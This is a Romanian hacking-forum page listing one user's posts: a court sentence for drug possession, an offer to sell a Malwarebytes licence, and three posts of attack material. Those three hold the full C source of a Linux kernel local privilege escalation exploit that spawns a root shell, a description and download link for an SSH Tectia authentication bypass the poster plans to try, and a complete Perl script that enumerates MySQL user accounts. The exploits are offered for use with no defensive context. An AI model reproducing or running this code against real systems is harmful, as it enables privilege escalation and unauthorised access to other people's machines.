Jump to content

wind

Active Members
  • Posts

    241
  • Joined

  • Last visited

Posts posted by wind

  1. Eu pentru 0,6 de 4mec, am luat 6 luni cu suspendare + 2 ani jumate termen de incercare + obligatii.

     

    Solutia pe scurt: În baza art. 4 alin. 1 şi 2 din Legea 143/2000, cu aplicarea art. 396 alin. 10 C.pr.pen., condamnă pe inculpatul L. la 6 (şase) luni închisoare pentru săvârşirea infracţiunii de deţinere fără drept de droguri de mare risc pentru consumul propriu. În baza art. 91 C. pen. dispune suspendarea executării pedepsei de 6 luni închisoare sub supraveghere şi stabileşte un termen de supraveghere de 2 ani, care va curge de la data rămânerii definitive a prezentei, conform dispoziţiilor art. 92 C. pen. În baza art. 93 alin. (1) C. pen. obligă inculpatul ca pe durata termenului de supraveghere să respecte următoarele măsuri de supraveghere: a) să se prezinte la Serviciul de Probaţiune de pe lângă Tribunalul Cluj, la datele fixate de acesta; B) să primească vizitele consilierului de probaţiune desemnat cu supravegherea sa; c) să anunţe, în prealabil, schimbarea locuinţei şi orice deplasare care depăşeşte 5 zile; d) să comunice schimbarea locului de muncă; e) să comunice informaţii şi documente de natură a permite controlul mijloacelor sale de existenţă.În baza art. 93 alin. (2) lit. a), b şi c C. pen. impune condamnatului să execute următoarele obligaţii: să urmeze un curs de pregătire şcolară ori de calificare profesională; să frecventeze programe de consiliere antidrog; să se supună măsurilor de control, tratament sau îngrijire medicală (în scopul dezintoxicării).În baza art. 93 alin. (3) C. pen., pe parcursul termenului de supraveghere, inculpatul va presta o muncă neremunerată în folosul comunităţii în cadrul Asociaţiei Filantropice Medical Creştine sau în cadrul Primăriei Municipiului Cluj-Napoca, pe o perioadă de 90 de zile. În baza art. 91 alin. (4) C. pen. atrage atenţia inculpatului asupra dispoziţiilor art. 96 C. pen.În baza art. 16 alin. 1 din Legea nr. 143/2000 dispune confiscarea specială de la inculpatul L.A. a cantităţii de 0,6 grame substanţă care conţine 4- MEC (Methylethcathinone) rămasă în urma analizelor de laborator, aflate în camera corpurilor delicte a IGPR, sigilate cu sigiliul tip M.I. nr. 35953. În baza art. 274 alin. 1 C.pr.pen., obligă pe inculpatul L. la plata în favoarea statului a sumei de 1300 lei cheltuieli judiciare.Cu apel în 10 zile de la comunicare.Pronunţată în şedinţă publică, astăzi, 13.11.2015.

  2. Malwarebytes' Anti-Malware este considerat cel mai bun ( al?turi de Norman MalwareCleaner ) program în detectarea ?i eliminarea malware-ului . Programul include tehnologii avansate, proiectate pentru a detecta/elimina/preveni rapid malware . Malwarebytes' Anti-Malware poate detecta ?i elimina ?i cei mai cunoscu?i ?i periculo?i viru?i/malware, monitorizeaz? fiecare proces în parte ?i opre?te r?spândirea malware-ului înainte ca acesta s? fie activ .

    Modul de protec?ie în timp real folose?te tehnologie avansat? de scanare euristic? , ce monitorizeaz? sistemul dumneavoastr?, p?strând-ul în condi?ii de siguran?? . Utilizatorii vor putea accesa centrul de amenin??ri al programului, unde se pot ?ine la curent cu cele mai recente amenin??ri descoperite .

    Caracteristici principale ale programului :

    Vitez? de scanare rapid?

    Abilitatea de a efectua scan?ri complete ale calculatorului

    Modul de protec?ie în timp real ( versiunea PRO )

    Actualiz?ri zilnice

    Carantin? cu amenin??rile detectate ( putând s? ?i le restaura?i dac? considera?i c? este un " fals pozitiv " )

    List? de ignorare atât pentru scanner cât ?i pentru modulul de protec?ie

    Set?ri pentru a îmbun?t??i performan?ele programului

    Înl?turare malware-ului manual

    Suport Multi-lingv ( ?i român? )

    Func?ioneaz? ?i împreun? cu alte soft-uri antimalware

    Suport pentru scanare rapid?

    Scanare fi?iere

    Scheduler

    Etc

    Poze:

    kj6i.png7prh.png

    myr0.png

    vdqt.png

    Pret: 10 E Orange ( Am urgent nevoie ).

    Detalile sunt copiate de pe google, pozele sunt reale, ofer TW. Licenta este pe viata !

  3. // archer.c
    //
    // 2012 sd@fucksheep.org
    //
    // Works reliably against x86-64 3.3-3.7 arch.
    //
    // Tested against:
    //
    // Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux
    // Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux
    // Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux
    // ...

    #include <assert.h>

    #define JUMP 0x0000100000001000LL
    #define BASE 0x380000000
    #define SIZE 0x010000000
    #define KSIZE 0x2000000

    static long ugid;

    void patch_current() {
    int i,j,k;
    char *current = *(char**)(((long)&i) & (-8192));
    long kbase = ((long)current)>>36;

    for (i=0; i<4000; i+=4) {
    long *p = (void *)&current[i];
    int *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) {
    for (k = 0; k < 8; k++)
    if (((int*)&ugid)[k%2] != t[j+k]) goto next;
    for (i = 0; i < 8; i++) t[j+i] = 0;
    for (i = 0; i < 10; i++) t[j+9+i] = -1;
    return;
    next:; }
    }
    }


    int main()
    {
    long u = getuid();
    long g = getgid();
    int i, f = socket(16,3,4);
    static int n[10] = {40,0x10014,0,0,45,-1};

    assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);

    setresuid(u,u,u); setresgid(g,g,g);
    ugid = (g<<32)|u;

    memcpy(1<<12, &patch_current, 1024);
    for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;
    send(f, n, sizeof(n), 0);
    setuid(0);
    return execl("/bin/bash", "-sh", 0);
    }

  4. http://www.exploit-db.com/sploits/23082.zip

    SSH Tectia Remote Authentication Bypass

    Tectia is the commercial OpenSSH solution. The product can be found at:

    SSH Key Management, Privileged Access Control, Identity and Access Governance, Data-in-Transit

    An attacker in the possession of a valid username of an SSH Tectia installation running on UNIX (verified: AIX/Linux) can login without a password.

    The bug is in the SSH USERAUTH CHANGE REQUEST routines which are there to allow a user to change their password. A bug in this code allows an attacker to login without a password by forcing a password change request prior to authentication.

    The vulnerability has been verified on UNIX operating systems and at least on this (recent) versions:

    • SSH-2.0-6.1.9.95 SSH Tectia Server (Latest available version from SSH Key Management, Privileged Access Control, Identity and Access Governance, Data-in-Transit)

    • SSH-2.0-6.0.11.5 SSH Tectia Server

    A default installation on Linux (version 6.1.9.95 of Tectia) is vulnerable to the attack.

    Asta pare interesant, cand am chef o sa-l incerc :D.

  5. # MySQL User Account Enumeration Utility
    # When an attacker authenticates using an incorrect password
    # with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server
    # the mysql server will respond with a different message than Access Denied, what makes
    # User Account Enumeration possible.
    # The Downside is that the attacker has to reconnect for each user enumeration attempt
    #20000 user accounts in 7 minutes
    #Mon Jan 16 09:00:18 UTC 2012
    #Mon Jan 16 09:07:26 UTC 2012
    #root@vs2067037:~# wc -l MEDIUM.LST
    #21109 MEDIUM.LST
    #A usernames.txt wordlist is included in this package
    #examples:
    #root@vs2067037:~# perl mysqlenum.pl host usernames.txt
    #
    #[*] HIT! -- USER EXISTS: administrator@host
    #
    #root@vs2067037:~# perl mysqlenum.pl host usernames.txt
    #
    #[*] HIT! -- USER EXISTS: admin@host
    #

    use IO::Socket;
    use Parallel::ForkManager;
    $|=1;

    if ($#ARGV != 1) {
    print "Usage: mysqlenumerate.pl <target> <wordlist>\n";
    exit;
    }

    $target = $ARGV[0];
    $wordlist = $ARGV[1];
    $numforks = 50;
    $pm = new Parallel::ForkManager($numforks);

    open FILE,"<$wordlist";
    unlink '/tmp/cracked';

    @users = ();
    $k=0;
    while(<FILE>) {
    chomp;
    $_ =~ s/\r//g;
    $users[$k++] = $_;
    }
    close FILE;
    $k2 = 0;
    for( {
    for ($k=0;$k<$numforks;$k++) {
    $k2++;
    if (($k2 > $#users) or (-e '/tmp/cracked')) {
    exit;
    }
    my $pid = $pm->start and next;
    $user = $users[$k2];
    goto further;
    again:
    print "Connect Error\n";
    further:
    my $sock = IO::Socket::INET->new(PeerAddr => $target,
    PeerPort => '3306',
    Proto => 'tcp') || goto again;
    recv($sock, $buff, 1024, 0);

    $buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".
    "\x4e\x5f\x51\x55\x45\x4d\x45\x00";
    $buf = chr(length($buf)-3). $buf;
    print $sock $buf;
    $res = recv($sock, $buff, 1024, 0);
    close($sock);
    if ($k2 % 100 == 0) {
    print $buff."\n";
    }
    if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}
    unless (-e '/tmp/cracked') {
    open FILE, ">/tmp/cracked";
    close FILE;
    print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
    open FILE, ">jackpot";
    print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";
    exit;
    }
    }
    $pm->wait_all_children;
    }

×
×
  • Create New...